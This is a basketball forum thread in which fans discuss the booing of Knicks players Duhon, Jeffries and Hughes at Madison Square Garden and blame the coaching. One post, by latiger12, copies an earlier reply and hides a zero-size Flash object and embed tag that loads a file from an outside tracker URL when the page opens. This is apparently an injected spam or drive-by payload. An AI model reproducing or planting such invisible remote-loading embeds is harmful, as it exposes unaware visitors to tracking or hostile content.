Knicks get booed during introduction

Paul1355

All Star
I just thought it was funny at the certain players booed during the introduction at MSG vs Philly.

Hughes, Jeffries, and Duhon got the worse boos I have heard from Knick fans in a while.

Mike D should listen to his fans and not play duhon and jeffries so much.

YanksKnicks86

Benchwarmer
Jeffries and Hughes are pretty bad but I wouldn't boo Duhon. He did some good things for the team last year and it's still early.

Kiyaman

Legend
Fans blaming the players for da coaching

I notice alot of the Knick-fans in the Garden are still "hyped-up" believing celebrity coach Dantoni is a winning coach.....so they blame the players.
I guess people can forget that having an ALL-STAR lineup of "Nash, Joe Johnson, Marion, Amare," and a top-5 role-player Jim Jackson coming off the bench to form your team, roster, and chemistry the first season for a 62 win season can make Alhiemer come into the picture where u only recall two people Nash and Dantoni's so-call system.

The Nets are finally finding out that their BUM-coach Frank is really a Bum, and was only winning games on the strength of "Kid, Kittles, Jefferson, and Kenyon Martin" leadership of the roster.

Coach Frank could not win one playoff series with the "BIG-3" of Kidd, Carter, and Jefferson.

latiger12

Rookie
Jeffries and Hughes are pretty bad but I wouldn't boo Duhon. He did some good things for the team last year and it's still early.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Duhon did contribute last year. He did not deserve the boo's

clumsy

Rotation player
Fans were actually watching the games, Booing duhon is a proud moment for NY..usually i think Knicks fans don't know anything about basketball. I'm not being sarcastic at all....Duhon is garbage at the NBA level.

Too bad they don't introduce the Owner...i think the real cause of all the problems.

YanksKnicks86

Benchwarmer
Yeah but come on, he is somewhat likeable? no? : ) I liked Duhon last year the first half of the season. Sure he ain't anything special, neither is Hughes, Jeffries , ECurry, The new White guy(Keep forgetting his name). It's a disgrace to see Jeffries in the starting lineup.

I like Lee and Gallinari, Robinson and sometimes Harrington. But both Harrington and Nate are chuckers. And I think Chandler is all hype.

Hey, at least we aren't The Nets!